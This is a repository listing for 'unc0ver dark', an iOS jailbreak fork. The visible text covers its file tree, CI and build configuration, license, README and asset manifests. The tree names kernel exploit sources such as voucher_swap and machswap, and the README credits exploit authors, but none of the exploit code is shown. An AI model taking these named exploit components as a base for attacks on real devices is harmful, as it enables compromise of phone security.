├── .github
└── ISSUE_TEMPLATE
│ ├── bug_report.md
│ └── feature_request.md
├── .gitignore
├── .gitmodules
├── .travis.yml
├── LICENSE
├── Makefile
├── README.md
├── Resources
├── Screenshot-1.PNG
├── Screenshot-2.PNG
├── Screenshot-3.PNG
└── Undecimus.ipa
├── Undecimus.xcodeproj
├── project.pbxproj
├── project.xcworkspace
│ ├── contents.xcworkspacedata
│ ├── xcshareddata
│ │ └── IDEWorkspaceChecks.plist
│ └── xcuserdata
│ │ ├── diatrus.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
│ │ └── shady.xcuserdatad
│ │ └── UserInterfaceState.xcuserstate
├── xcshareddata
│ └── xcschemes
│ │ └── Undecimus.xcscheme
└── xcuserdata
│ ├── diatrus.xcuserdatad
│ └── xcschemes
│ │ └── xcschememanagement.plist
│ └── shady.xcuserdatad
│ ├── xcdebugger
│ └── Breakpoints_v2.xcbkptlist
│ └── xcschemes
│ └── xcschememanagement.plist
├── Undecimus
├── Assets.xcassets
│ ├── AppIcon.appiconset
│ │ ├── Contents.json
│ │ ├── Icon-App-1024x1024.png
│ │ ├── Icon-App-20x20@1x-1.png
│ │ ├── Icon-App-20x20@2x-1.png
│ │ ├── Icon-App-20x20@2x.png
│ │ ├── Icon-App-20x20@3x.png
│ │ ├── Icon-App-29x29@1x-1.png
│ │ ├── Icon-App-29x29@1x.png
│ │ ├── Icon-App-29x29@2x-1.png
│ │ ├── Icon-App-29x29@2x.png
│ │ ├── Icon-App-29x29@3x.png
│ │ ├── Icon-App-40x40@1x.png
│ │ ├── Icon-App-40x40@2x-1.png
│ │ ├── Icon-App-40x40@2x.png
│ │ ├── Icon-App-40x40@3x.png
│ │ ├── Icon-App-60x60@2x.png
│ │ ├── Icon-App-60x60@3x.png
│ │ ├── Icon-App-76x76@1x.png
│ │ ├── Icon-App-76x76@2x.png
│ │ └── Icon-App-83.5x83.5@2x.png
│ ├── Contents.json
│ ├── maintenance.imageset
│ │ ├── Contents.json
│ │ ├── maintenance.png
│ │ ├── maintenance@2x.png
│ │ └── maintenance@3x.png
│ ├── meridian.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
│ ├── picker.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
│ ├── purple.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
│ ├── settings.imageset
│ │ ├── Contents.json
│ │ ├── settings.png
│ │ ├── settings@2x.png
│ │ └── settings@3x.png
│ └── white.imageset
│ │ ├── Contents.json
│ │ ├── picker.png
│ │ ├── picker@2x.png
│ │ └── picker@3x.png
├── Base.lproj
│ └── LaunchScreen.storyboard
├── Info.plist
├── Main.storyboard
├── frameworks
│ └── SpringBoardServices.framework
│ │ └── SpringBoardServices.tbd
├── include
│ ├── IOKitLib.h
│ ├── MobileGestalt.h
│ ├── NSTask.h
│ ├── UIProgressHUD.h
│ ├── archive.h
│ ├── archive_entry.h
│ ├── common.h
│ ├── iokit.h
│ ├── ipc_port.h
│ ├── libproc.h
│ ├── mach_vm.h
│ ├── net
│ │ └── route.h
│ ├── reboot.h
│ └── sys
│ │ ├── kern_control.h
│ │ └── proc_info.h
├── resources
│ ├── Menlo-Regular.ttf
│ ├── Painting_With_Chocolate.ttf
│ ├── binpack64-256.md5sums
│ ├── binpack64-256.tar.lzma
│ ├── darkmeridian.png
│ ├── darkmeridian@2x.png
│ ├── darkmeridian@3x.png
│ ├── lists.tar.lzma
│ ├── meridian.png
│ ├── meridian@2x.png
│ ├── meridian@3x.png
│ ├── purple.png
│ ├── purple@2x.png
│ ├── purple@3x.png
│ ├── white.png
│ ├── white@2x.png
│ └── white@3x.png
└── source
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── ArchiveFile.h
│ ├── ArchiveFile.m
│ ├── CreditsTableViewController.h
│ ├── CreditsTableViewController.m
│ ├── FakeApt.h
│ ├── FakeApt.m
│ ├── JailbreakViewController.h
│ ├── JailbreakViewController.m
│ ├── KernelExecution.h
│ ├── KernelExecution.m
│ ├── KernelMemory.c
│ ├── KernelMemory.h
│ ├── KernelOffsets.h
│ ├── KernelOffsets.m
│ ├── KernelUtilities.c
│ ├── KernelUtilities.h
│ ├── SettingsTableViewController.h
│ ├── SettingsTableViewController.m
│ ├── async_wake.c
│ ├── async_wake.h
│ ├── diagnostics.h
│ ├── diagnostics.m
│ ├── early_kalloc.c
│ ├── early_kalloc.h
│ ├── find_port.c
│ ├── find_port.h
│ ├── hideventsystem.c
│ ├── hideventsystem.h
│ ├── jailbreak.h
│ ├── jailbreak.m
│ ├── kalloc_crash.c
│ ├── kalloc_crash.h
│ ├── kc_parameters.c
│ ├── kc_parameters.h
│ ├── kernel_alloc.c
│ ├── kernel_alloc.h
│ ├── kernel_call.c
│ ├── kernel_call.h
│ ├── kernel_memory.c
│ ├── kernel_memory.h
│ ├── kernel_slide.c
│ ├── kernel_slide.h
│ ├── log.c
│ ├── log.h
│ ├── machswap2_pwn.h
│ ├── machswap2_pwn.m
│ ├── machswap_offsets.h
│ ├── machswap_offsets.m
│ ├── machswap_pwn.h
│ ├── machswap_pwn.m
│ ├── main.m
│ ├── necp.c
│ ├── necp.h
│ ├── pac.c
│ ├── pac.h
│ ├── parameters.c
│ ├── parameters.h
│ ├── platform.c
│ ├── platform.h
│ ├── platform_match.c
│ ├── platform_match.h
│ ├── prefs.h
│ ├── prefs.m
│ ├── remote_call.c
│ ├── remote_call.h
│ ├── remote_memory.c
│ ├── remote_memory.h
│ ├── unlocknvram.c
│ ├── unlocknvram.h
│ ├── user_client.c
│ ├── user_client.h
│ ├── utils.h
│ ├── utils.m
│ ├── voucher_swap-poc.c
│ ├── voucher_swap-poc.h
│ ├── voucher_swap.c
│ └── voucher_swap.h
├── Update.txt
├── apt
├── Release
├── apt-key_1.8.0_iphoneos-arm.deb
├── apt-lib_1.8.0-sileo3_iphoneos-arm.deb
├── apt_1.8.0_iphoneos-arm.deb
├── base_1-5_iphoneos-arm.deb
├── bash_5.0.3-1_iphoneos-arm.deb
├── berkeleydb_6.2.32-1_iphoneos-arm.deb
├── bzip2_1.0.6-1_iphoneos-arm.deb
├── ca-certificates_0.0.2_all.deb
├── com.parrotgeek.nobetaalert_1.3.1_iphoneos-arm.deb
├── com.ps.letmeblock_0.0.1_iphoneos-arm.deb
├── com.saurik.substrate.safemode_0.9.6001.1_iphoneos-arm.deb
├── coreutils-bin_8.30-3_iphoneos-arm.deb
├── coreutils_8.30-2_iphoneos-arm.deb
├── cydia-dark_1.9.3~b5_iphoneos-arm.deb
├── cydia-lproj_1.9.3~b1_iphoneos-arm.deb
├── cydia_2.0_iphoneos-arm.deb
├── darwintools_1-6_iphoneos-arm.deb
├── debianutils_4.8.6-1_iphoneos-arm.deb
├── diffutils_3.6-1_iphoneos-arm.deb
├── diskdev-cmds_593.221.1-1_iphoneos-arm.deb
├── dpkg_1.19.2-11dark_iphoneos-arm.deb
├── essential_0-1_iphoneos-arm.deb
├── file_5.35-2_iphoneos-arm.deb
├── findutils_4.6.0-2_iphoneos-arm.deb
├── firmware-sbin_0-1_all.deb
├── gcrypt_1.8.3-1_iphoneos-arm.deb
├── gettext_0.19.8-1_iphoneos-arm.deb
├── gnupg_2.2.11-2_iphoneos-arm.deb
├── gnutls_3.5.19-1_iphoneos-arm.deb
├── grep_3.1-1_iphoneos-arm.deb
├── gzip_1.9-1_iphoneos-arm.deb
├── jailbreak-resources_1.0~b23_iphoneos-arm.deb
├── ldid_2-2.1.1+elucubratus2_iphoneos-arm.deb
├── libassuan_2.5.1-1_iphoneos-arm.deb
├── libgmp10_6.1.2-1_iphoneos-arm.deb
├── libgpg-error_1.32-1_iphoneos-arm.deb
├── libidn2_6.1.2-1_iphoneos-arm.deb
├── libksba_1.3.5-1_iphoneos-arm.deb
├── libplist_2.0.0-2_iphoneos-arm.deb
├── libssl1.0_1.0.2r-1_iphoneos-arm.deb
├── libtasn1_4.13-1_iphoneos-arm.deb
├── libunistring_0.9.10-1_iphoneos-arm.deb
├── lz4_1.7.5-1_iphoneos-arm.deb
├── lzma_5.2.4-2_iphoneos-arm.deb
├── mobilesubstrate_0.9.7033_iphoneos-arm.deb
├── ncurses5-libs_5.9-1_iphoneos-arm.deb
├── ncurses_6.1-1_iphoneos-arm.deb
├── nettle_3.4.1-1_iphoneos-arm.deb
├── npth_1.6-1_iphoneos-arm.deb
├── openssh_7.9p1-3_iphoneos-arm.deb
├── org.coolstar.sileo_1.0.8_iphoneos-arm.deb
├── org.thebigboss.repo.icons_1.0_all.deb
├── p11-kit_0.23.12-1_iphoneos-arm.deb
├── profile.d_0-1_iphoneos-arm.deb
├── readline_8.0-1_iphoneos-arm.deb
├── rsync_3.1.3-2_iphoneos-arm.deb
├── sed_4.5-1_iphoneos-arm.deb
├── shell-cmds_118-8_iphoneos-arm.deb
├── signing-certificate_0.0.1_iphoneos-arm.deb
├── system-cmds_790.30.1-2_iphoneos-arm.deb
├── system-memory-reset-fix_1.0_iphoneos-arm.deb
├── tar_1.30-2_iphoneos-arm.deb
├── trustinjector_0.4~b5_iphoneos-arm.deb
├── uikittools_2.0.1_iphoneos-arm.deb
├── us.diatr.sileorespring_1.1_iphoneos-arm.deb
├── us.diatr.sillyo_1.4_iphoneos-arm.deb
└── wget_1.19.5-2_iphoneos-arm.deb
├── post.sh
└── sileolicense-u0dark.md
/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Bug report
3 | about: Create a report to help us improve
4 | title: ''
5 | labels: bug
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the bug**
11 | A clear and concise description of what the bug is and what you expected to happen.
12 |
13 | **To Reproduce**
14 | Steps to reproduce the behavior:
15 | 1. Go to '...'
16 | 2. Click on '....'
17 | 3. Scroll down to '....'
18 | 4. See error
19 |
20 | **Screenshots**
21 | If applicable, add screenshots to help explain your problem.
22 |
23 | **Device (please complete the following information):**
24 | - iOS Version:
25 | - iOS Device:
26 | - unc0ver Version:
27 |
28 | **Place an "x" between the brackets if true:**
29 | - [ ] this is a bug others will be able to reproduce
30 | - [ ] this issue is present with all tweaks uninstalled(except for default packages) or disabled
31 | - [ ] this issue is present after a rootfs restore
32 | - [ ] this issue is present on the latest version of unc0ver
33 |
34 | **Logs**
35 | If applicable, add logs or error messages here.
36 |
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
1 | ---
2 | name: Feature request
3 | about: Suggest an idea for this project
4 | title: ''
5 | labels: enhancement
6 | assignees: ''
7 |
8 | ---
9 |
10 | **Describe the feature you'd like**
11 | A clear and concise description of what you want to happen.
12 |
13 | **Describe alternatives you've considered**
14 | A clear and concise description of any alternative solutions or features you've considered.
15 |
16 | **Additional context**
17 | Add any other context or screenshots about the feature request here.
18 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Xcode
2 | #
3 | # gitignore contributors: remember to update Global/Xcode.gitignore, Objective-C.gitignore & Swift.gitignore
4 |
5 | ## Build generated
6 | build/
7 | DerivedData/
8 |
9 | ## Various settings
10 | *.pbxuser
11 | !default.pbxuser
12 | *.mode1v3
13 | !default.mode1v3
14 | *.mode2v3
15 | !default.mode2v3
16 | *.perspectivev3
17 | !default.perspectivev3
18 | xcuserdata/
19 |
20 | ## Other
21 | *.moved-aside
22 | *.xccheckout
23 | *.xcscmblueprint
24 |
25 | ## Obj-C/Swift specific
26 | *.hmap
27 | #*.ipa
28 | Payload
29 | *.dSYM.zip
30 | *.dSYM
31 |
32 | # CocoaPods
33 | #
34 | # We recommend against adding the Pods directory to your .gitignore. However
35 | # you should judge for yourself, the pros and cons are mentioned at:
36 | # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control
37 | #
38 | # Pods/
39 | #
40 | # Add this line if you want to avoid checking in source code from the Xcode workspace
41 | *.xcworkspace
42 |
43 | # Carthage
44 | #
45 | # Add this line if you want to avoid checking in source code from Carthage dependencies.
46 | # Carthage/Checkouts
47 |
48 | Carthage/Build
49 |
50 | # fastlane
51 | #
52 | # It is recommended to not store the screenshots in the git repo. Instead, use fastlane to re-generate the
53 | # screenshots whenever they are needed.
54 | # For more information about the recommended setup visit:
55 | # https://docs.fastlane.tools/best-practices/source-control/#source-control
56 |
57 | fastlane/report.xml
58 | fastlane/Preview.html
59 | fastlane/screenshots/**/*.png
60 | fastlane/test_output
61 |
62 | # Code Injection
63 | #
64 | # After new code Injection tools there's a generated folder /iOSInjectionProject
65 | # https://github.com/johnno1962/injectionforxcode
66 |
67 | iOSInjectionProject/
68 | # General
69 | .DS_Store
70 | .AppleDouble
71 | .LSOverride
72 |
73 | # Icon must end with two \r
74 | Icon
75 |
76 |
77 | # Thumbnails
78 | ._*
79 |
80 | # Files that might appear in the root of a volume
81 | .DocumentRevisions-V100
82 | .fseventsd
83 | .Spotlight-V100
84 | .TemporaryItems
85 | .Trashes
86 | .VolumeIcon.icns
87 | .com.apple.timemachine.donotpresent
88 |
89 | # Directories potentially created on remote AFP share
90 | .AppleDB
91 | .AppleDesktop
92 | Network Trash Folder
93 | Temporary Items
94 | .apdisk
95 |
96 | # theos
97 | .theos/
98 | packages/
99 | obj/
100 |
101 | *.ipa
102 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "Injector"]
2 | path = Injector
3 | url = https://github.com/pwn20wndstuff/Injector.git
4 | [submodule "snappy"]
5 | path = snappy
6 | url = https://github.com/sbingner/snappy.git
7 | [submodule "patchfinder64"]
8 | path = patchfinder64
9 | url = https://github.com/pwn20wndstuff/patchfinder64.git
10 | [submodule "offset-cache"]
11 | path = offset-cache
12 | url = https://github.com/sbingner/offset-cache.git
13 | [submodule "kerneldec"]
14 | path = kerneldec
15 | url = https://github.com/sbingner/kerneldec.git
16 |
--------------------------------------------------------------------------------
/.travis.yml:
--------------------------------------------------------------------------------
1 | language: objective-c
2 | os: osx
3 | osx_image: xcode10.1
4 | env:
5 | global:
6 | - MAKEFLAGS="-j100"
7 | git:
8 | submodules: false
9 | depth: false
10 |
11 | before_install:
12 | - ssh-keyscan github.com >> ~/.ssh/known_hosts
13 | - git submodule update --init
14 | - brew install dpkg ldid
15 | script: make
16 |
17 | before_deploy:
18 | - git config --local user.name $username
19 | - git config --local user.email $email
20 | - export TRAVIS_TAG=${TRAVIS_TAG:-$version-snapshot-$(git log --format=%h -1)-v$snapshot_version}
21 | - git tag $TRAVIS_TAG
22 |
23 | notifications:
24 | email: false
25 |
26 | deploy:
27 | provider: releases
28 | skip_cleanup: true
29 | prerelease: $prerelease
30 | api_key:
31 | secure: 2bZxDZ5zRvS4xteeQQjmEP08tl5wqLq9/D4LYPAB4ohfZCPfT/1ucpUESjVN89jsEvakWlnTf5o/rFYc9OK2GlI4OFo6I9Rwseb3PLhLOvi/RHiMxHF3VkpdTRFelsYtZjxAn8p2gs5Q0Yx26qq0qySmGg+Yvn7CZ9OeP+8Ch+H8/fcyH0dD+Nxqo8Xl0dPs8U05EQ2cKNfGTLv7l1h7B7pqVU+2UKB8La/vYZfFOYRe5W5mwhQv4vOZVG1U3DpQqaIXOGybmICaDlFEv76qJf9VmjIU48+tzMAq5xqadPsUErbNg9/gTiBTgQ751te8vXQAtV0CINvrtteeUcAGXe9dnfX85+Ql7HhDxcVC4Y3uPgGiNhJb3bSXyQ7/mzO7uhtXi7D9YYFg+YCSyuZdK+xYlGWxLqBKWSxC5nvH98r5ZZZVrbAfbHRy8JqRjCZdymggm9VdKziFyUtcJpsLroGpJT/Z66R3oo+I9nR3O8ucGt7D009I8Gc902Mbf8rG0kQPmZBaH234lOuMNXxc/OGvOHe9qIhz3Na/CNdbvQkdLzIA1ZhyqEntl7zQr6UGOEfluL+9Sff8KmlIwcn5XIEYpfGKVs4IXYQU1miGaywlyxv26neGp1bmutV66u0egpbREylqGiiVdT5w6bXvfEe//NxWRPt3RM14qSmmRUo=
32 | file: Undecimus.ipa
33 | on:
34 | repo: nqcshady/unc0ver-dark
35 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2018 Pwn20wnd
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | TARGET = Undecimus
2 |
3 | .PHONY: all clean
4 |
5 | all: clean
6 | xcodebuild clean build CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO PRODUCT_BUNDLE_IDENTIFIER="us.diatr.undecimus" -sdk iphoneos -configuration Debug -quiet -UseModernBuildSystem=NO
7 | ln -sf build/Debug-iphoneos Payload
8 | # strip Payload/$(TARGET).app/$(TARGET)
9 | # zip -r9 $(TARGET).ipa Payload/$(TARGET).app
10 | zip -r9q $(TARGET).ipa Payload/$(TARGET).app
11 |
12 | clean:
13 | rm -rf build Payload $(TARGET).ipa
14 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | [](https://travis-ci.com/nqcshady/unc0ver-dark)
3 |
4 | 
5 |
6 | unc0ver dark (EOL)
7 | The most advanced jailbreak tool, with more freedom
8 |
9 | 
10 |
11 |
12 |
13 | ### FAQ
14 | * Will the jailbreak see an update to 12.4? -- No. unc0ver has remained closed source for a while now, and the project is now dead. Please use Diatrus' Sileo for unc0ver as an alternative from now on.
15 | * Where can I stay up to date on unc0ver dark? -- [Join the unc0ver dark Discord](https://discord.gg/4pYwBCb)
16 | * My Cydia is crashing? How do I fix this? -- Uninstall CyDown. It is not updated for the new fork of Cydia. Also, piracy is no fun. ;(
17 | * Jailbreak is failing first try? -- You need WiFi for initial jailbreak, and therefore cannot use Airplane Mode. This is due to licensing on Cydia Substrate.
18 | * How do I switch from another jailbreak? -- unc0ver dark automatically handles the switching process. So no need to worry about switching. No rootFS restore is required.
19 |
20 | ### Changes from unc0ver
21 | * APT 1.8
22 | * **New** true black UI designed by [23 Aaron](https://twitter.com/23Aaron_)
23 | * Substrate is downloaded from the Internet
24 | * Sileo support via [Diatrus](https://github.com/Diatrus)
25 | * Theme switcher by [Diatrus](https://github.com/Diatrus) & [Hydri](https://twitter.com/HydriDev_)
26 |
27 | ### Available themes
28 | * True Black
29 | * Dark Purple
30 | * White
31 | * OG Meridian White/v0rtex-S
32 | * Dark Meridian
33 | 
34 |
35 | ## Getting support
36 | * Use the built-in diagnostics tool
37 | * Join the u0 Dark [Discord](https://discord.gg/4pYwBCb)
38 | * r/jailbreak on [Reddit](https://reddit.com/r/jailbreak)
39 |
40 | ## Best practices
41 | * Perform a full restore with Rollectra or Succession before switching from the other jailbreaks
42 | * Turn off Siri before starting the jailbreak
43 |
44 | ## Source code
45 | * This project is completely open source and it **will** stay that way
46 | * Any kind of contribution is welcome (pull-requests)
47 | * The original source code can be found on [here](https://github.com/pwn20wndstuff/Undecimus), on @pwn20wndstuff's GitHub account
48 |
49 | ## unc0ver dark Members
50 | * [shady](https://twitter.com/versusess)
51 | * [Diatrus](https://twitter.com/Diatrus) - Honorary Member, left.
52 | * [Ultra](https://twitter.com/Ultra_038)
53 | * [Hydri](https://twitter.com/HydriDev_)
54 | * [23Aaron](https://twitter.com/23Aaron_)
55 | * Syndrome - Syndrome#7786 (Discord)
56 |
57 | # Credits
58 | This fork wouldn't have been able to be created without these people and tools.
59 | * [pwn20wnd](https://twitter.com/Pwn20wnd) - original u0 developer
60 | * [Sam Bingner](https://twitter.com/sbingner) - original u0 developer
61 | * [patchfinder64](https://github.com/pwn20wndstuff/patchfinder64/tree/d2df2a303885d773cab95c18536dc8b218b13ca1)
62 | * [snappy](https://github.com/sbingner/snappy/tree/8c0f4ec12ccbcdc50212ac83541df7533083e556)
63 | * [Injector](https://github.com/pwn20wndstuff/Injector/tree/4e25f6d5eb045a0b8b7362d8ad090474e7c73eef)
64 | * [Ian Beer](https://twitter.com/i41nbeer) for mach_portal, triple_fetch, async_wake and deja_xnu
65 | * [Morpheus](https://twitter.com/Morpheus______) for the QiLin Toolkit
66 | * [xerub](https://twitter.com/xerub) for libjb and the original patchfinder64
67 | * [iBSparkes](https://twitter.com/iBSparkes) for the original amfid_payload, jailbreakd, pspawn_hook, machswap, and machswap2
68 | * [stek29](https://twitter.com/stek29) for the patchfinder64 additions, unlocknvram, host_get_special_port(4) patch and shenanigans bypass
69 | * [theninjaprawn](https://twitter.com/theninjaprawn) for the patchfinder64 additions
70 | * [Jay Freeman (saurik)](https://twitter.com/saurik) for Cydia and Substrate
71 | * [tihmstar](https://twitter.com/tihmstar) for libgrabkernel and liboffsetfinder64
72 | * [CoolStar](https://twitter.com/coolstarorg) for originally testing the snapshot rename idea on corellium (and Sileo)
73 | * [Chronix](https://www.youtube.com/channel/UCEj2uj_VZYYOa8tIBb63tUg) for fixing README
74 | * [Sukarodo](https://twitter.com/sukarodo) for README changes and support of the project
75 | * [Undecimus-Resources](https://github.com/pwn20wndstuff/Undecimus-Resources)
76 |
--------------------------------------------------------------------------------
/Resources/Screenshot-1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Screenshot-1.PNG
--------------------------------------------------------------------------------
/Resources/Screenshot-2.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Screenshot-2.PNG
--------------------------------------------------------------------------------
/Resources/Screenshot-3.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Screenshot-3.PNG
--------------------------------------------------------------------------------
/Resources/Undecimus.ipa:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Resources/Undecimus.ipa
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | IDEDidComputeMac32BitWarning
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/diatrus.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/diatrus.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/shady.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus.xcodeproj/project.xcworkspace/xcuserdata/shady.xcuserdatad/UserInterfaceState.xcuserstate
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcshareddata/xcschemes/Undecimus.xcscheme:
--------------------------------------------------------------------------------
1 |
2 |
5 |
8 |
9 |
15 |
21 |
22 |
23 |
24 |
25 |
30 |
31 |
32 |
33 |
39 |
40 |
41 |
42 |
43 |
44 |
54 |
56 |
62 |
63 |
64 |
65 |
66 |
67 |
73 |
75 |
81 |
82 |
83 |
84 |
86 |
87 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcuserdata/diatrus.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | Undecimus.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcuserdata/shady.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
--------------------------------------------------------------------------------
/Undecimus.xcodeproj/xcuserdata/shady.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | SchemeUserState
6 |
7 | Undecimus.xcscheme_^#shared#^_
8 |
9 | orderHint
10 | 0
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "size" : "20x20",
5 | "idiom" : "iphone",
6 | "filename" : "Icon-App-20x20@2x.png",
7 | "scale" : "2x"
8 | },
9 | {
10 | "size" : "20x20",
11 | "idiom" : "iphone",
12 | "filename" : "Icon-App-20x20@3x.png",
13 | "scale" : "3x"
14 | },
15 | {
16 | "size" : "29x29",
17 | "idiom" : "iphone",
18 | "filename" : "Icon-App-29x29@1x.png",
19 | "scale" : "1x"
20 | },
21 | {
22 | "size" : "29x29",
23 | "idiom" : "iphone",
24 | "filename" : "Icon-App-29x29@2x.png",
25 | "scale" : "2x"
26 | },
27 | {
28 | "size" : "29x29",
29 | "idiom" : "iphone",
30 | "filename" : "Icon-App-29x29@3x.png",
31 | "scale" : "3x"
32 | },
33 | {
34 | "size" : "40x40",
35 | "idiom" : "iphone",
36 | "filename" : "Icon-App-40x40@2x.png",
37 | "scale" : "2x"
38 | },
39 | {
40 | "size" : "40x40",
41 | "idiom" : "iphone",
42 | "filename" : "Icon-App-40x40@3x.png",
43 | "scale" : "3x"
44 | },
45 | {
46 | "size" : "60x60",
47 | "idiom" : "iphone",
48 | "filename" : "Icon-App-60x60@2x.png",
49 | "scale" : "2x"
50 | },
51 | {
52 | "size" : "60x60",
53 | "idiom" : "iphone",
54 | "filename" : "Icon-App-60x60@3x.png",
55 | "scale" : "3x"
56 | },
57 | {
58 | "size" : "20x20",
59 | "idiom" : "ipad",
60 | "filename" : "Icon-App-20x20@1x-1.png",
61 | "scale" : "1x"
62 | },
63 | {
64 | "size" : "20x20",
65 | "idiom" : "ipad",
66 | "filename" : "Icon-App-20x20@2x-1.png",
67 | "scale" : "2x"
68 | },
69 | {
70 | "size" : "29x29",
71 | "idiom" : "ipad",
72 | "filename" : "Icon-App-29x29@1x-1.png",
73 | "scale" : "1x"
74 | },
75 | {
76 | "size" : "29x29",
77 | "idiom" : "ipad",
78 | "filename" : "Icon-App-29x29@2x-1.png",
79 | "scale" : "2x"
80 | },
81 | {
82 | "size" : "40x40",
83 | "idiom" : "ipad",
84 | "filename" : "Icon-App-40x40@1x.png",
85 | "scale" : "1x"
86 | },
87 | {
88 | "size" : "40x40",
89 | "idiom" : "ipad",
90 | "filename" : "Icon-App-40x40@2x-1.png",
91 | "scale" : "2x"
92 | },
93 | {
94 | "size" : "76x76",
95 | "idiom" : "ipad",
96 | "filename" : "Icon-App-76x76@1x.png",
97 | "scale" : "1x"
98 | },
99 | {
100 | "size" : "76x76",
101 | "idiom" : "ipad",
102 | "filename" : "Icon-App-76x76@2x.png",
103 | "scale" : "2x"
104 | },
105 | {
106 | "size" : "83.5x83.5",
107 | "idiom" : "ipad",
108 | "filename" : "Icon-App-83.5x83.5@2x.png",
109 | "scale" : "2x"
110 | },
111 | {
112 | "size" : "1024x1024",
113 | "idiom" : "ios-marketing",
114 | "filename" : "Icon-App-1024x1024.png",
115 | "scale" : "1x"
116 | }
117 | ],
118 | "info" : {
119 | "version" : 1,
120 | "author" : "xcode"
121 | }
122 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-1024x1024.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-1024x1024.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@1x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x-1.png:
--------------------------------------------------------------------------------
